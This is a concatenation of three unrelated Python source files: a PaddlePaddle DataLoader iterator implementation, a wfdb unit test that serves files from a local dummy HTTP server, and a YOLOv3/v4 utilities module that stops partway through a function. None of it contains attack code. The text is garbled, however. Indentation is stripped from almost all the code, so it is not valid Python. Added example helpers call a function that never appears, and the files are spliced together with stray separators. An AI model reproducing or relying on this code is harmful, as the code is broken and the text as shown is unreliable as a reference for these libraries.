class _DataLoaderIterSingleProcess(_DataLoaderIterBase):
"""
Single-process implementation of DataLoaderIter, loading data from
the dataset in the main process
"""
def __init__(self, loader):
super(_DataLoaderIterSingleProcess, self).__init__(loader)
self._dataset_fetcher = _DatasetKind.create_fetcher(
self._dataset_kind, self._dataset, self._auto_collate_batch,
self._collate_fn, self._drop_last)
# NOTE: _structure_infos is used to record the data structure of
# each batch so it can be restored after reading Tensors
# from blocking_queue in single-process mode. Since only a
# single process is used in this mode, we can record the data
# structures sequentially in a list without recording the
# send and recv indices
self._structure_infos = []
# NOTE: len(self._places) batches of data compose one output
# iteration; the blocking_queue set here can cache at most
# 2 iterations of data
self._blocking_queue_capacity = 1 * len(self._places)
self._init_thread()
self._shutdown = False
global _loader
_loader = self
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._blocking_queue_capacity,
len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _thread_loop(self, legacy_expected_place):
# NOTE(zhiqiu): Set the expected place for the new thread to the same as the parent
# thread; this will call platform::SetDeviceId() in C++ internally.
# If we do not set the CUDA device id in the new thread, the default device id will
# be 0, which may cost hundreds of MB of GPU memory on CUDAPlace(0) if some CUDA
# APIs are called in this thread.
_set_expected_place(legacy_expected_place)
while not self._thread_done_event.is_set():
try:
indices = next(self._sampler_iter)
# read data from dataset in mini-batch
batch = self._dataset_fetcher.fetch(indices,
self._thread_done_event)
except StopIteration:
self._exit_thread_expectedly()
return
if batch is None or self._thread_done_event.is_set(): break
# flat batch and record structure infos
batch, structure = _flatten_batch(batch)
self._structure_infos.append(structure)
if self._thread_done_event.is_set(): break
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
for slot in batch:
if isinstance(slot, (paddle.Tensor, core.eager.Tensor)):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if self._thread_done_event.is_set(): break
try:
self._blocking_queue.push(array)
except:
self._exit_thread_expectedly()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
self._exit_thread_expectedly()
def __next__(self):
trace_event = profiler.RecordEvent(
name="_DataLoaderIterSingleProcess",
event_type=profiler.TracerEventType.Dataloader)
trace_event.begin()
try:
benchmark().check_if_need_record(self)
benchmark().before_reader()
if in_dygraph_mode():
data = core.eager.read_next_tensor_list(
self._reader.read_next_list()[0])
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if _in_legacy_dygraph():
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else: # in static mode
if self._return_list:
data = self._reader.read_next_list()
for i in range(len(data)):
data[i] = data[i]._move_to_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
# static graph organizes data across multiple devices as a list; if
# the place number is 1, there is only 1 device, so extract the data
# from the list to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
benchmark().after_reader()
return data
except StopIteration:
self._reader.shutdown()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
finally:
trace_event.end()
def _shutdown_thread(self):
if self._thread:
self._thread_done_event.set()
# NOTE: wait up to 3 seconds for _thread to exit; if it has not
# exited normally by then, fall back to joining it
for _ in range(3):
if self._thread.is_alive():
time.sleep(1)
else:
break
else:
if self._thread is not threading.current_thread():
self._thread.join()
self._thread = None
# python2 compatibility
def next(self):
return self.__next__()
def _try_shutdown_all(self):
if not self._shutdown:
try:
# _blocking_queue in keep-order mode holds sub-threads;
# need to release thread resources on unexpected exit
if self._blocking_queue:
self._blocking_queue.close()
self._blocking_queue = None
# NOTE: the blocking queue should be closed first, because a
# blocking queue read may hang and _thread_done_event
# could then never be checked
self._shutdown_thread()
finally:
self._shutdown = True
def __del__(self):
self._try_shutdown_all()
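# Illustrative sketch, not part of this module: which iterator class gets used is
# decided by DataLoader's num_workers argument — num_workers=0 selects the
# single-process iterator above, num_workers>0 the multi-process iterator below.
# The helper is hypothetical and never called; it assumes the public
# paddle.io.DataLoader API and the _example_toy_datasets sketch defined earlier
# in this file.
def _example_iterate_dataloader():
    """Hypothetical helper: drive both iterator kinds through paddle.io.DataLoader."""
    map_dataset, _ = _example_toy_datasets()
    # num_workers=0: batches are fetched in the main process (single-process iterator).
    single_loader = paddle.io.DataLoader(map_dataset, batch_size=4, num_workers=0)
    # num_workers=2: worker subprocesses feed a shared result queue (multi-process iterator).
    multi_loader = paddle.io.DataLoader(map_dataset, batch_size=4, num_workers=2)
    for image, label in single_loader:
        pass  # each element is one batch of 4 samples
    for image, label in multi_loader:
        pass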
class _DataLoaderIterMultiProcess(_DataLoaderIterBase):
def __init__(self, loader):
super(_DataLoaderIterMultiProcess, self).__init__(loader)
self._persistent_workers = loader._persistent_workers
self._resume_worker_cnt = 0
assert self._num_workers > 0, "Multi-process DataLoader " \
"invalid num_workers({})".format(self._num_workers)
# subprocess workers' result queue
self._data_queue = None
# data fetched from _data_queue is reordered by _rcvd_idx to
# keep data order; data whose index is not equal to _rcvd_idx
# is cached in _task_infos
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
self._structure_infos = []
# _outstanding_capacity indices are put out at first, and the
# blocking_queue capacity is also _outstanding_capacity.
# _outstanding_capacity is chosen so that each indices_queue
# holds at least 2 indices, and the outstanding batches cache
# output data for at least 2 iterations (note that len(_places)
# batches are composed into one iteration output)
self._outstanding_capacity = 2 * max(self._num_workers,
len(self._places))
# see _try_put_indices
self._thread_lock = threading.Lock()
# init workers and indices queues and put 2 indices in each indices queue
self._init_workers()
for _ in range(self._outstanding_capacity):
self._try_put_indices()
self._init_thread()
self._shutdown = False
def _init_workers(self):
# multiprocess worker and indices queue lists are initially empty
self._workers = []
self._worker_status = []
self._indices_queues = []
self._workers_idx_cycle = itertools.cycle(range(self._num_workers))
# create data_queue for workers
self._data_queue = multiprocessing.Queue()
# events for workers and thread; the thread event is only needed
# in multi-processing mode
self._workers_done_event = multiprocessing.Event()
self._thread_done_event = threading.Event()
for i in range(self._num_workers):
indices_queue = multiprocessing.Queue()
self._indices_queues.append(indices_queue)
worker = multiprocessing.Process(
target=_worker_loop,
args=(self._dataset, self._dataset_kind, indices_queue,
self._data_queue, self._workers_done_event,
self._auto_collate_batch, self._collate_fn,
self._drop_last, self._worker_init_fn, i,
self._num_workers, self._use_shared_memory))
worker.daemon = True
worker.start()
self._workers.append(worker)
self._worker_status.append(True)
core._set_process_pids(id(self), tuple(w.pid for w in self._workers))
_set_SIGCHLD_handler()
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except:
self._data_queue.cancel_join_thread()
self._data_queue.close()
break
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._outstanding_capacity, len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread_done_event = threading.Event()
# the thread event is only needed in multi-processing mode
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _reset(self):
# resume iteration in following steps
# 1. Resume workers, clear worker caches
# put _ResumeIteration to all worker as resume iteration flag
with self._thread_lock:
self._resume_worker_cnt = self._num_workers
for worker_id in range(self._num_workers):
self._indices_queues[worker_id].put(_ResumeIteration())
self._batches_outstanding += 1
# all flags will be checked in _thread_loop; simply wait here
while self._resume_worker_cnt > 0:
time.sleep(0.5)
# 2. clear blocking_queue caches
# in order not to restart the thread, we just clear
# the blocking_queue caches instead of recreating one
while self._blocking_queue.size() >= len(self._places):
if in_dygraph_mode():
data = core.eager.read_next_tensor_list(
self._reader.read_next_list()[0])
else:
if _in_legacy_dygraph():
self._reader.read_next_var_list()
elif self._return_list:
self._reader.read_next_list()
else:
data = self._reader.read_next()
# 3. reset all states
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
self._structure_infos = []
# set all worker status available
self._worker_status = [True] * self._num_workers
# 4. reset _sampler_iter and put prefetch indices to start next epoch
# init workers and indices queues and put 2 indices in each indices queue
self._sampler_iter = iter(self._index_sampler)
for _ in range(self._outstanding_capacity):
self._try_put_indices()
def _shutdown_worker(self, worker_id, shutdown=False):
if self._worker_status[worker_id] or (self._persistent_workers and
shutdown):
self._indices_queues[worker_id].put(None)
self._worker_status[worker_id] = False
def _try_shutdown_all(self, timeout=None):
if not self._shutdown:
try:
self._exit_thread_expectedly()
self._clear_and_remove_data_queue()
# _workers_done_event should be set before putting None
# into indices_queue; workers will exit on reading None from
# indices_queue
self._workers_done_event.set()
for i in range(self._num_workers):
self._shutdown_worker(i, shutdown=True)
if not self._shutdown:
for w in self._workers:
w.join(timeout)
for q in self._indices_queues:
q.cancel_join_thread()
q.close()
finally:
core._erase_process_pids(id(self))
self._shutdown = True
def _thread_loop(self, legacy_expected_place):
# NOTE(zhiqiu): Set the expected place for the new thread to the same as the parent
# thread; this will call platform::SetDeviceId() in C++ internally.
# If we do not set the CUDA device id in the new thread, the default device id will
# be 0, which may cost hundreds of MB of GPU memory on CUDAPlace(0) if some CUDA
# APIs are called in this thread.
_set_expected_place(legacy_expected_place)
while not self._thread_done_event.is_set():
batch = self._get_data()
if not self._thread_done_event.is_set():
if batch is None:
self._exit_thread_expectedly()
else:
if isinstance(batch, _ResumeIteration):
assert self._resume_worker_cnt > 0
self._resume_worker_cnt -= 1
continue
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
if self._use_shared_memory:
for tensor in batch:
array.append(tensor)
else:
# a LoDTensor not in shared memory is not
# serializable and cannot be created in workers
for slot in batch:
if isinstance(slot, (paddle.Tensor,
core.eager.Tensor)):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except Exception as e:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
finally:
self._rcvd_idx += 1
def _get_data(self):
while not self._thread_done_event.is_set():
# For IterableDataset, batch indices are generated infinitely
# until each worker raises StopIteration, but a process raising
# StopIteration discards batch indices that are counted
# in _send_idx without increasing _rcvd_idx, so we check
# whether the worker is still alive here to skip the discarded
# batch indices and increase _rcvd_idx
if self._dataset_kind == _DatasetKind.ITER:
while self._rcvd_idx < self._send_idx:
info = self._task_infos[self._rcvd_idx]
if len(info) == 3 or self._worker_status[info[0]]:
break
del self._task_infos[self._rcvd_idx]
self._rcvd_idx += 1
self._batches_outstanding -= 1
else:
# NOTE: when _rcvd_idx catches up with _send_idx, it means
# one of the following:
# 1. all 2 * num_workers batches have been loaded
# and stored in _blocking_queue
# 2. all data has been drained
# we need to let _thread block at _data_queue
# get_data so it does not occupy the CPU, which would
# otherwise take CPU time from model running
# NOTE: in persistent workers mode, do not check for data
# drained here; simply let it go on to the _data_queue
# read to get _ResumeIteration
if not self._persistent_workers:
# NOTE: _rcvd_idx and _send_idx only record batches among
# workers; even if batches among workers are drained, there
# may still be data in the blocking queue
if self._batches_outstanding < len(self._places):
return None
if self._rcvd_idx in self._task_infos and \
len(self._task_infos[self._rcvd_idx]) == 3:
info = self._task_infos.pop(self._rcvd_idx)
self._structure_infos.append(info[2])
return info[1]
try:
# [ avoid hang ]: the main process may block at _reader.read_next on
# KeyboardInterrupt, so we make the following tradeoff:
# 1. get data with a timeout, MP_STATUS_CHECK_INTERVAL(5s) by
# default; if KeyboardInterrupt blocks, failed workers will be
# detected and a RuntimeError raised to quit DataLoader in the
# timeout exception handling.
# 2. if getting data times out and all workers are alive, continue
# to get data again
data = self._data_queue.get(timeout=self._timeout)
except Exception as e:
# check if thread done event set when waiting data
if self._thread_done_event.is_set():
continue
# check failed workers
failed_workers = []
for i, w in enumerate(self._workers):
if self._worker_status[i] and not w.is_alive():
failed_workers.append(w)
self._shutdown_worker(i)
if len(failed_workers) > 0:
self._exit_thread_unexpectedly()
pids = ', '.join(str(w.pid) for w in failed_workers)
raise RuntimeError("DataLoader {} workers exit unexpectedly, " \
"pids: {}".format(len(failed_workers), pids))
# get(timeout) will call _poll(timeout) and may raise IOError
if isinstance(e, queue.Empty) or isinstance(e, IOError):
# continue on timeout to keep getting data from queue
continue
self._exit_thread_unexpectedly()
logging.error("DataLoader reader thread failed({}) to read data from " \
"workers' result queue.".format(e))
six.reraise(*sys.exc_info())
else:
if self._dataset_kind == _DatasetKind.ITER and isinstance(
data, _IterableDatasetStopIteration):
# if a worker hits StopIteration, we shut that worker down;
# note that the batch of indices that triggered StopIteration
# is discarded, so the outstanding batch count should decrease
# and another set of indices should be put for the other
# workers that may still be running.
if self._persistent_workers:
self._worker_status[data.worker_id] = False
else:
self._shutdown_worker(data.worker_id)
self._batches_outstanding -= 1
self._try_put_indices()
continue
idx, batch, structure = data
if isinstance(idx, _ResumeIteration) and batch is None \
and structure is None:
return idx
if isinstance(batch, _WorkerException):
self._exit_thread_unexpectedly()
batch.reraise()
if idx == self._rcvd_idx:
del self._task_infos[idx]
self._structure_infos.append(structure)
return batch
else:
self._task_infos[idx] += (batch, structure)
continue
def _try_put_indices(self):
assert self._batches_outstanding <= self._outstanding_capacity, \
"too many indices have been put to queue"
# In multi-process mode for IterableDataset, _try_put_indices is
# called both in the main process (our implementation has a blocking
# queue whose reads happen in the main process) and in the thread,
# which may cause the following errors:
# 1. "ValueError: generator already executing" in next(self._sampler_iter)
# 2. re-entrancy when increasing _send_idx
# so we add a lock for thread safety; since _try_put_indices is a
# lightweight function outside the data-reading pipeline, this lock
# has almost no influence on performance
with self._thread_lock:
try:
indices = next(self._sampler_iter)
except StopIteration:
return
for i in range(self._num_workers):
worker_idx = next(self._workers_idx_cycle)
if self._worker_status[worker_idx]:
break
else:
return
self._indices_queues[worker_idx].put((self._send_idx, indices))
self._task_infos[self._send_idx] = (worker_idx, )
self._batches_outstanding += 1
self._send_idx += 1
def __del__(self):
self._try_shutdown_all()
def _shutdown_on_exit(self):
self._try_shutdown_all(1)
def __next__(self):
trace_event = profiler.RecordEvent(
name="_DataLoaderIterMultiProcess",
event_type=profiler.TracerEventType.Dataloader)
trace_event.begin()
try:
benchmark().check_if_need_record(self)
benchmark().before_reader()
# _batches_outstanding here records the total number of batches
# between _try_put_indices and the output of the data; this value
# should equal _outstanding_capacity if data is not drained. If
# _batches_outstanding is less than the number of _places, there is
# not enough data to generate the next output, so close blocking_queue
# and set _thread_done_event here; py_reader will raise StopIteration,
# and workers and indices_queues are ended in the StopIteration handling
if self._batches_outstanding < len(self._places):
if self._persistent_workers:
raise StopIteration
else:
self._thread_done_event.set()
self._blocking_queue.close()
if in_dygraph_mode():
data = core.eager.read_next_tensor_list(
self._reader.read_next_list()[0])
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if _in_legacy_dygraph():
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if self._return_list:
data = self._reader.read_next_list()
for i in range(len(data)):
data[i] = data[i]._move_to_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
# static graph organizes multi-device data as a list; if the
# place number is 1 there is only one device, so extract the data
# from the list to stay compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
self._on_output_batch()
benchmark().after_reader()
return data
except StopIteration:
if not self._persistent_workers:
self._reader.shutdown()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
finally:
trace_event.end()
# python2 compatibility
def next(self):
return self.__next__()
def _on_output_batch(self):
for _ in range(len(self._places)):
self._batches_outstanding -= 1
self._try_put_indices()
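# Minimal usage sketch (illustrative only, not part of this module): a DataLoader with
# num_workers > 0 is what drives the multi-process iterator above; the dataset shapes and
# a fork-based start method are assumptions made for the example.
def _example_multiprocess_dataloader():
    import numpy as np
    import paddle
    from paddle.io import TensorDataset, DataLoader

    images = paddle.to_tensor(np.random.random([64, 3, 8, 8]).astype('float32'))
    labels = paddle.to_tensor(np.arange(64).reshape([64, 1]).astype('int64'))
    dataset = TensorDataset([images, labels])
    # num_workers > 0 selects the multi-process iterator implemented above
    loader = DataLoader(dataset, batch_size=8, shuffle=True, num_workers=2)
    for image, label in loader:
        # each batch is produced by __next__ above and restored via _restore_batch
        pass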
|
test_url.py
|
import gzip
import http.server
import threading
import unittest
import wfdb.io._url
class TestNetFiles(unittest.TestCase):
"""
Test accessing remote files.
"""
def test_requests(self):
"""
Test reading a remote file using various APIs.
This tests that we can create a file object using
wfdb.io._url.openurl(), and tests that the object implements
the standard Python API functions for a file of the
appropriate type.
Parameters
----------
N/A
Returns
-------
N/A
"""
text_data = """
BERNARDO: Who's there?
FRANCISCO: Nay, answer me: stand, and unfold yourself.
BERNARDO: Long live the king!
FRANCISCO: Bernardo?
BERNARDO: He.
FRANCISCO: You come most carefully upon your hour.
BERNARDO: 'Tis now struck twelve; get thee to bed, Francisco.
"""
binary_data = text_data.encode()
file_content = {'/foo.txt': binary_data}
# Test all possible combinations of:
# - whether or not the server supports compression
# - whether or not the server supports random access
# - chosen buffering policy
for allow_gzip in (False, True):
for allow_range in (False, True):
with DummyHTTPServer(file_content=file_content,
allow_gzip=allow_gzip,
allow_range=allow_range) as server:
url = server.url('/foo.txt')
for buffering in (-2, -1, 0, 20):
self._test_text(url, text_data, buffering)
self._test_binary(url, binary_data, buffering)
def _test_text(self, url, content, buffering):
"""
Test reading a URL using text-mode file APIs.
Parameters
----------
url : str
URL of the remote resource.
content : str
Expected content of the resource.
buffering : int
Buffering policy for openurl().
Returns
-------
N/A
"""
# read(-1), readable(), seekable()
with wfdb.io._url.openurl(url, 'r', buffering=buffering) as tf:
self.assertTrue(tf.readable())
self.assertTrue(tf.seekable())
self.assertEqual(tf.read(), content)
self.assertEqual(tf.read(), '')
# read(10)
with wfdb.io._url.openurl(url, 'r', buffering=buffering) as tf:
result = ''
while True:
chunk = tf.read(10)
result += chunk
if len(chunk) < 10:
break
self.assertEqual(result, content)
# readline(), seek(), tell()
with wfdb.io._url.openurl(url, 'r', buffering=buffering) as tf:
result = ''
while True:
rpos = tf.tell()
tf.seek(0)
tf.seek(rpos)
chunk = tf.readline()
result += chunk
if len(chunk) == 0:
break
self.assertEqual(result, content)
def _test_binary(self, url, content, buffering):
"""
Test reading a URL using binary-mode file APIs.
Parameters
----------
url : str
URL of the remote resource.
content : bytes
Expected content of the resource.
buffering : int
Buffering policy for openurl().
Returns
-------
N/A
"""
# read(-1), readable(), seekable()
with wfdb.io._url.openurl(url, 'rb', buffering=buffering) as bf:
self.assertTrue(bf.readable())
self.assertTrue(bf.seekable())
self.assertEqual(bf.read(), content)
self.assertEqual(bf.read(), b'')
self.assertEqual(bf.tell(), len(content))
# read(10)
with wfdb.io._url.openurl(url, 'rb', buffering=buffering) as bf:
result = b''
while True:
chunk = bf.read(10)
result += chunk
if len(chunk) < 10:
break
self.assertEqual(result, content)
self.assertEqual(bf.tell(), len(content))
# readline()
with wfdb.io._url.openurl(url, 'rb', buffering=buffering) as bf:
result = b''
while True:
chunk = bf.readline()
result += chunk
if len(chunk) == 0:
break
self.assertEqual(result, content)
self.assertEqual(bf.tell(), len(content))
# read1(10), seek(), tell()
with wfdb.io._url.openurl(url, 'rb', buffering=buffering) as bf:
bf.seek(0, 2)
self.assertEqual(bf.tell(), len(content))
bf.seek(0)
result = b''
while True:
rpos = bf.tell()
bf.seek(0)
bf.seek(rpos)
chunk = bf.read1(10)
result += chunk
if len(chunk) == 0:
break
self.assertEqual(result, content)
self.assertEqual(bf.tell(), len(content))
# readinto(bytearray(10))
with wfdb.io._url.openurl(url, 'rb', buffering=buffering) as bf:
result = b''
chunk = bytearray(10)
while True:
count = bf.readinto(chunk)
result += chunk[:count]
if count < 10:
break
self.assertEqual(result, content)
self.assertEqual(bf.tell(), len(content))
# readinto1(bytearray(10))
with wfdb.io._url.openurl(url, 'rb', buffering=buffering) as bf:
result = b''
chunk = bytearray(10)
while True:
count = bf.readinto1(chunk)
result += chunk[:count]
if count == 0:
break
self.assertEqual(result, content)
self.assertEqual(bf.tell(), len(content))
class DummyHTTPServer(http.server.HTTPServer):
"""
HTTPServer used to simulate a web server for testing.
The server may be used as a context manager (using "with"); during
execution of the "with" block, a background thread runs that
listens for and handles client requests.
Attributes
----------
file_content : dict
Dictionary containing the content of each file on the server.
The keys are absolute paths (such as "/foo.txt"); the values
are the corresponding content (bytes).
allow_gzip : bool, optional
True if the server should return compressed responses (using
"Content-Encoding: gzip") when the client requests them (using
"Accept-Encoding: gzip").
allow_range : bool, optional
True if the server should return partial responses (using 206
Partial Content and "Content-Range") when the client requests
them (using "Range").
server_address : tuple (str, int), optional
A tuple specifying the address and port number where the
server should listen for connections. If the port is 0, an
arbitrary unused port is selected. The default address is
"127.0.0.1" and the default port is 0.
"""
def __init__(self, file_content, allow_gzip=True, allow_range=True,
server_address=('127.0.0.1', 0)):
super().__init__(server_address, DummyHTTPRequestHandler)
self.file_content = file_content
self.allow_gzip = allow_gzip
self.allow_range = allow_range
def url(self, path='/'):
"""
Generate a URL that points to a file on this server.
Parameters
----------
path : str, optional
Path of the file on the server.
Returns
-------
url : str
Absolute URL for the specified file.
"""
return 'http://127.0.0.1:%d/%s' % (self.server_address[1],
path.lstrip('/'))
def __enter__(self):
super().__enter__()
self.thread = threading.Thread(target=self.serve_forever)
self.thread.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
self.thread.join()
self.thread = None
return super().__exit__(exc_type, exc_val, exc_tb)
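# Illustrative usage sketch (not part of the original tests): the context-manager pattern
# described in the class docstring, serving one file and reading it back through
# wfdb.io._url.openurl(); the file name and content are placeholders.
def _example_dummy_server_usage():
    content = {'/hello.txt': b'hello, world\n'}
    with DummyHTTPServer(file_content=content) as server:
        with wfdb.io._url.openurl(server.url('/hello.txt'), 'rb') as f:
            assert f.read() == b'hello, world\n'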
class DummyHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
"""
HTTPRequestHandler used to simulate a web server for testing.
"""
def do_HEAD(self):
self.send_head()
def do_GET(self):
body = self.send_head()
self.wfile.write(body)
def log_message(self, message, *args):
pass
def send_head(self):
content = self.server.file_content.get(self.path)
if content is None:
self.send_error(404)
return b''
headers = {'Content-Type': 'text/plain'}
status = 200
if self.server.allow_gzip:
headers['Vary'] = 'Accept-Encoding'
if 'gzip' in self.headers.get('Accept-Encoding', ''):
content = gzip.compress(content)
headers['Content-Encoding'] = 'gzip'
if self.server.allow_range:
headers['Accept-Ranges'] = 'bytes'
req_range = self.headers.get('Range', '')
if req_range.startswith('bytes='):
start, end = req_range.split('=')[1].split('-')
start = int(start)
if end == '':
end = len(content)
else:
end = min(len(content), int(end) + 1)
if start < end:
status = 206
resp_range = 'bytes %d-%d/%d' % (
start, end - 1, len(content))
content = content[start:end]
else:
status = 416
resp_range = 'bytes */%d' % len(content)
content = b''
headers['Content-Range'] = resp_range
headers['Content-Length'] = len(content)
self.send_response(status)
for h, v in sorted(headers.items()):
self.send_header(h, v)
self.end_headers()
return content
if __name__ == "__main__":
unittest.main()
|
utils.py
|
#================================================================
#
# File name : utils.py
# Author : PyLessons
# Created date: 2020-09-27
# Website : https://pylessons.com/
# GitHub : https://github.com/pythonlessons/TensorFlow-2.x-YOLOv3
# Description : additional yolov3 and yolov4 functions
#
#================================================================
from multiprocessing import Process, Queue, Pipe
import cv2
import time
import random
import colorsys
import numpy as np
import tensorflow as tf
from yolov3.configs import *
from yolov3.yolov4 import *
from tensorflow.python.saved_model import tag_constants
def load_yolo_weights(model, weights_file):
tf.keras.backend.clear_session() # used to reset layer names
# load Darknet original weights to TensorFlow model
if YOLO_TYPE == "yolov3":
range1 = 75 if not TRAIN_YOLO_TINY else 13
range2 = [58, 66, 74] if not TRAIN_YOLO_TINY else [9, 12]
if YOLO_TYPE == "yolov4":
range1 = 110 if not TRAIN_YOLO_TINY else 21
range2 = [93, 101, 109] if not TRAIN_YOLO_TINY else [17, 20]
with open(weights_file, 'rb') as wf:
major, minor, revision, seen, _ = np.fromfile(wf, dtype=np.int32, count=5)
j = 0
for i in range(range1):
if i > 0:
conv_layer_name = 'conv2d_%d' %i
else:
conv_layer_name = 'conv2d'
if j > 0:
bn_layer_name = 'batch_normalization_%d' %j
else:
bn_layer_name = 'batch_normalization'
conv_layer = model.get_layer(conv_layer_name)
filters = conv_layer.filters
k_size = conv_layer.kernel_size[0]
in_dim = conv_layer.input_shape[-1]
if i not in range2:
# darknet weights: [beta, gamma, mean, variance]
bn_weights = np.fromfile(wf, dtype=np.float32, count=4 * filters)
# tf weights: [gamma, beta, mean, variance]
bn_weights = bn_weights.reshape((4, filters))[[1, 0, 2, 3]]
bn_layer = model.get_layer(bn_layer_name)
j += 1
else:
conv_bias = np.fromfile(wf, dtype=np.float32, count=filters)
# darknet shape (out_dim, in_dim, height, width)
conv_shape = (filters, in_dim, k_size, k_size)
conv_weights = np.fromfile(wf, dtype=np.float32, count=np.product(conv_shape))
# tf shape (height, width, in_dim, out_dim)
conv_weights = conv_weights.reshape(conv_shape).transpose([2, 3, 1, 0])
if i not in range2:
conv_layer.set_weights([conv_weights])
bn_layer.set_weights(bn_weights)
else:
conv_layer.set_weights([conv_weights, conv_bias])
assert len(wf.read()) == 0, 'failed to read all data'
def Load_Yolo_model():
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
print(f'GPUs {gpus}')
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: pass
if YOLO_FRAMEWORK == "tf": # TensorFlow detection
if YOLO_TYPE == "yolov4":
Darknet_weights = YOLO_V4_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V4_WEIGHTS
if YOLO_TYPE == "yolov3":
Darknet_weights = YOLO_V3_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V3_WEIGHTS
if YOLO_CUSTOM_WEIGHTS == False:
print("Loading Darknet_weights from:", Darknet_weights)
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=YOLO_COCO_CLASSES)
load_yolo_weights(yolo, Darknet_weights) # use Darknet weights
else:
print("Loading custom weights from:", YOLO_CUSTOM_WEIGHTS)
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=TRAIN_CLASSES)
checkpoint = f"./checkpoints/{TRAIN_MODEL_NAME}"
if TRAIN_YOLO_TINY:
checkpoint += "_Tiny"
yolo.load_weights(checkpoint) # use custom weights
elif YOLO_FRAMEWORK == "trt": # TensorRT detection
saved_model_loaded = tf.saved_model.load(YOLO_CUSTOM_WEIGHTS, tags=[tag_constants.SERVING])
signature_keys = list(saved_model_loaded.signatures.keys())
yolo = saved_model_loaded.signatures['serving_default']
return yolo
def image_preprocess(image, target_size, gt_boxes=None):
ih, iw = target_size
h, w, _ = image.shape
scale = min(iw/w, ih/h)
nw, nh = int(scale * w), int(scale * h)
image_resized = cv2.resize(image, (nw, nh))
image_paded = np.full(shape=[ih, iw, 3], fill_value=128.0)
dw, dh = (iw - nw) // 2, (ih-nh) // 2
image_paded[dh:nh+dh, dw:nw+dw, :] = image_resized
image_paded = image_paded / 255.
if gt_boxes is None:
return image_paded
else:
gt_boxes[:, [0, 2]] = gt_boxes[:, [0, 2]] * scale + dw
gt_boxes[:, [1, 3]] = gt_boxes[:, [1, 3]] * scale + dh
return image_paded, gt_boxes
def draw_bbox(image, bboxes, CLASSES=YOLO_COCO_CLASSES, show_label=True, show_confidence = True, Text_colors=(255,255,0), rectangle_colors='', tracking=False):
NUM_CLASS = read_class_names(CLASSES)
num_classes = len(NUM_CLASS)
image_h, image_w, _ = image.shape
hsv_tuples = [(1.0 * x / num_classes, 1., 1.) for x in range(num_classes)]
#print("hsv_tuples", hsv_tuples)
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
random.seed(0)
random.shuffle(colors)
random.seed(None)
for i, bbox in enumerate(bboxes):
coor = np.array(bbox[:4], dtype=np.int32)
score = bbox[4]
class_ind = int(bbox[5])
bbox_color = rectangle_colors if rectangle_colors != '' else colors[class_ind]
bbox_thick = int(0.6 * (image_h + image_w) / 1000)
if bbox_thick < 1: bbox_thick = 1
fontScale = 0.75 * bbox_thick
(x1, y1), (x2, y2) = (coor[0], coor[1]), (coor[2], coor[3])
# put object rectangle
cv2.rectangle(image, (x1, y1), (x2, y2), bbox_color, bbox_thick*2)
if show_label:
# get text label
score_str = " {:.2f}".format(score) if show_confidence else ""
if tracking: score_str = " "+str(score)
try:
label = "{}".format(NUM_CLASS[class_ind]) + score_str
except KeyError:
print("You received KeyError, this might be that you are trying to use yolo original weights")
